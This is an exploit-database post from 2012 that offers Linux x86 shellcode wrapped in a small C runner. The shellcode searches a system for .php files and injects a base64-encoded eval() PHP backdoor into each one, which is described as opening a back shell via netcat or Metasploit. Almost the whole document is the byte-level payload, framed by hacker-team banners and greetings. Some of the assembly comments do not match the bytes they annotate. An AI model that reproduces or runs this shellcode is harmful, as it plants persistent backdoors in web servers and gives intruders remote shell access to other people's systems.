Lucene search
KedAns-Dz1337DAY-ID-17439HistoryJan 25, 2012 - 12:00 a.m.
linux/x86 Search (*.php) and Inject PHP_BACKD00R
2012-01-2500:00:00
KedAns-Dz
0day.today
18
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
/*
###
# Title : linux/x86 Search (*.php) and Inject PHP_BACKD00R exploit/shellcode
# Author : KedAns-Dz
# E-mail : [email protected] ([email protected]) | [email protected] | [email protected]
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com
# Facebook : http://facebook.com/KedAns
# platform : linux/x86
# Type : shellcode / local exploit
# Size : 380 bytes + Payload 204 bytes
# Inf0 : afTer Inj3ct PHP backd00r Open any .php File ex:(index.php) and spawn BackShell via (NC/MSF)
###
##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. |
# | ------------------------------------------------- < |
###
*/
// Reference : http://1337day.com/exploits/17392 * by rigan
#include <stdio.h>
char shellcode[] =
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x83\xec\x01" // sub %esp,$0x1
"\xc6\x04\x24\x2f" // mov byte %esp, $0x2f
"\x89\xe3" // mov %ebx,%esp
"\xb0\x0c" // mov %al,$0x0c
"\xcd\x80" // int $0x80
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x83\xec\x01" // sub %esp,$0x01
"\xc6\x04\x24\x2e" // mov %esp, $0x2e
"\xeb\x02" // jmp short .me
"\xeb\x63" // jmp short .me
"\xe8\xf9\xff\xff\xff" // call .str - exit(0)
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\xb0\x01" // mov %al,$0x01
"\xcd\x80" // int $0x80
"\x31\xc0" // xor %eax,%eax
"\x89\xfb" // mov %ebx,%edi
"\x31\xc9" // xor %ecx,%ecx
"\xb1\x02" // mov %cl,$0x02
"\xb0\x05" // mov %al,$0x05
"\xcd\x80" // int $0x80
"\x31\xdb" // xor %ebx,%ebx
"\x89\xc3" // mov %ebx,%eax
"\x31\xc9" // xor %ecx,%ecx
"\x31\xc0" // xor %eax,%eax
"\x99" // cdq
"\xb2\x02" // mov %dl,$0x02
"\xb0\x13" // mov %al,$0x13
"\xcd\x80" // int $0x80
"\x31\xc0" // xor %eax,%eax
"\x89\xf1" // mov %ecx,%esi
"\xb2\x32\x30\x34" // mov %dl,$0x343032 [ Backd00r S!zE = 204 bytes ]
"\xb0\x04" // mov %al,$0x04
"\xcd\x80" // int $0x80
"\x31\xc0" // xor %eax,%eax
"\xb0\x06" // mov %al,$0x06
"\xcd\x80" // int $0x80
"\xc3" // retn
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\x31\xc9" // xor %ecx,%ecx
"\x99" // cdq
"\x42" // inc %edx
"\x8a\x1c\x17" // mov %bl, %edi, %edx
"\x84\xdb" // test %bl, %bl
"\x74\x1a" // je short .me
"\x3a\x1e" // cmp %bl, %esi
"\x75\xf4" // jnz short .me
"\x8a\x04\x0e" // mov %al, %esi, %ecx
"\x8a\x1c\x17" // mov %bl, %edi, %edx
"\x84\xc0" // test %al, %al
"\x74\x08" // je short .me
"\x41" // inc %ecx
"\x42" // inc %edx
"\x38\xc3" // cmp %bl, %al
"\x74\xf0" // je short .me
"\xeb\x04" // jmp short .me
"\x31\xc0" // xor %eax,%eax
"\xb0\x02" // mov %al,$0x02
"\xc3" // retn
"\x55" // push %ebp
"\x89\xe5" // mov %ebp,%esp
"\xb0\xfa" // mov %al,$0xfa
"\x29\xc4" // sub %esp,%eax
"\x31\xc0" // xor %eax,%eax
"\x31\xc9" // xor %ecx,%ecx
"\x8d\x5d\x08" // lea %ebx,dword %ebp ,$0x08
"\xb0\x05" // mov %al,$0x05
"\xcd\x80" // int $0x80
"\x85\xc0" // test %eax,%eax
"\x78\x22" // js short .me
"\x89\x45\x0c" // mov dword %ebp $0x0c,%eax
"\x8b\x75\x0c" // mov esi,dword %ebp $0x0c
"\x89\xf3" // mov %ebx,%esi
"\x31\xc0" // xor %eax,%eax
"\x31\xc9" // xor %ecx,%ecx
"\x8d\x4c\x24\x64" // lea %ecx,dword %esp $0x64
"\xb0\x59" // mov %al,$0x59
"\xcd\x80" // int $0x80
"\x85\xc0" // test %eax,%eax
"\x75\x19" // jnz short .me
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\x89\xf3" // mov %ebx,%esi
"\xb0\x06" // mov %al,$0x06
"\xcd\x80" // int $0x80
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x66\x68\x2e\x2e" // push $0x2e2e
"\x89\xe3" // mov %ebx,%esp
"\xb0\x0c" // mov %al,$0x0c
"\xcd\x80" // int $0x80
"\xc9" // leave
"\xc3" // retn
"\x8d\x54\x24\x6e" // lea %edx,dword %esp $0x6e
"\x81\x3a\x70\x72\x6f\x63" // cmp dword %edx,$0x636f7270
"\x74\xc6" // je short .me
"\x80\x3a\x2e" // cmp %edx, $0x2e
"\x75\x05" // jnz short .me
"\xe9\xbc\xff\xff\xff" // jmp .str
"\x89\xd3" // mov %ebx,%edx
"\x89\xe1" // mov %ecx,%esp
"\x31\xc0" // xor %eax,%eax
"\xb0\xc4" // mov %al,$0xc4
"\xcd\x80" // int $0x80
"\x66\xb9\xff\xef" // mov %cx,$0xefff
"\x66\xbb\xff\x9f" // mov %bx,$0x9fff
"\x41" // inc %ecx
"\x43" // inc %ebx
"\x8b\x44\x24\x10" // mov %eax,dword %esp $0x10
"\x66\x21\xc8" // and %ax,%cx
"\x66\x39\xd8" // cmp %ax,%bx
"\x75\x05" // jnz short .me
"\xe9\x97" // jmp .me
"\xff\xff\xff" // .
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x83\xec\xec" // sub %esp,$0x14
"\x01\xc6" // add %esi,%eax
"\x04\x24" // add %al,$0x24
"\x2e\x89\xd3" // mov %ebx,%edx
"\xb0\x0c" // mov %al,$0x0c
"\xcd\x80" // int $0x80
"\x85\xc0" // test %eax,%eax
"\x75\x0a" // jnz short .me
"\xe8\x65\xff\xff\xff" // call .str
"\xe9\x79\xff\xff\xff" // jmp .str
"\x31\xc0" // xor %eax,%eax
"\x89\xd3" // mov %ebx,%edx
"\x31\xc9" // xor %ecx,%ecx
"\xb1\x02" // mov %cl,$0x02
"\xb0\x21" // mov %al,$0x21
"\xcd\x80" // int $0x80
"\x85\xc0" // test %eax,%eax
"\x74\x05" // je short .me
"\xe9\x64\xff\xff\xff" // jmp .str
"\x3c\x02" // cmp %al,$0x02
"\x74\x18" // je short .me
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x68\x2e\x70\x68\x70" // push $0x7068702e
"\x89\xe6" // mov %esi,%esp
"\xe8\xf6\xfe\xff\xff" // call .str
"\x3c\x02" // cmp %al,$0x02
"\x74\x05" // je short .me
"\xe9\x30\xff\xff\xff" // jmp .str
"\xeb\x0b" // jmp short .me
"\x5e" // pop %esi
"\xe8\xb9\xfe\xff\xff" // call .str
"\xe9\x23\xff\xff\xff" // jmp .str
"\xe8\xf0\xff\xff\xff" // call .str
/* PHP Backd00r - Payload by MSF | enc=Base64 =>*/
"\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63"
"\x6f\x64\x65\x28\x4d\x63\x6b\x78\x32\x2e\x63\x68\x72\x28\x34"
"\x37\x29\x2e\x66\x6a\x73\x4b\x54\x4e\x67\x44\x48\x4a\x4d\x64"
"\x74\x71\x52\x6c\x6a\x4e\x67\x44\x48\x62\x61\x68\x64\x59\x7a"
"\x59\x41\x78\x32\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x66\x6a"
"\x55\x30\x4e\x54\x61\x67\x4b\x4a\x34\x62\x42\x6d\x7a\x59\x42"
"\x62\x58\x6d\x68\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x41\x41"
"\x41\x42\x5a\x6d\x67\x52\x58\x47\x5a\x54\x61\x68\x42\x52\x55"
"\x49\x6e\x68\x51\x32\x70\x6d\x57\x4d\x32\x41\x57\x59\x66\x5a"
"\x73\x44\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x4e\x67\x45\x6c"
"\x35\x2e\x63\x68\x72\x28\x34\x33\x29\x2e\x56\x42\x6f\x4c\x79"
"\x39\x7a\x61\x47\x67\x76\x59\x6d\x6c\x75\x69\x65\x4e\x51\x55"
"\x34\x6e\x68\x73\x41\x76\x4e\x67\x41\x29\x29\x3b"
/* End payload ...*/
"\x3c\x68" // cmp %al,$0x68
"\x74\x6d" // je short .me
"\x6c" // ins %edi,%dx
"\x3e\x3c\x73" // cmp %al,$0x73
"\x63\x72\x69" // arpl word %edx $0x69,%si
"\x70\x74" // jo short .me
"\x3e\x61" // popad
"\x6c" // ins %edi,%dx
"\x65\x72\x74" // jb short .me
"\x28\x22" // sub %edx,%ah
"\x70\x77" // jo short .me
"\x6e" // outs %dx,%edi
"\x33\x64\x22\x29" // xor %esp,dword %edx $0x29
"\x3c\x73" // cmp %al,$0x73
"\x63\x72\x69" // arpl word %edx $0x69,%si
"\x70\x74" // jo short .me
"\x3e\x3c\x2f" // cmp %al,$0x2f
"\x68\x74\x6d\x6c\x3e"; // push $0x3e6c6d74
int main()
{
printf("%d\n", strlen(shellcode));
(*(void (*)()) shellcode)();
return 0;
}
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * Kalashinkov3 * SeeMe * ZoRLu * anT!-Tr0J4n
# Anjel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#=================================================================================================